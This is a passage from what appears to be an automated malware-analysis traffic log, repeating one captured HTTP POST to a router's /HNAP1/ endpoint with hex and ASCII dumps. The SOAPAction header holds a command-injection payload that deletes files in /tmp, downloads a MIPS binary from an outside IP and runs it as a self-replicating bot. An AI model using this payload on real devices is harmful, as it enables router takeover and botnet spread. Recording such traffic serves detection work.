xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 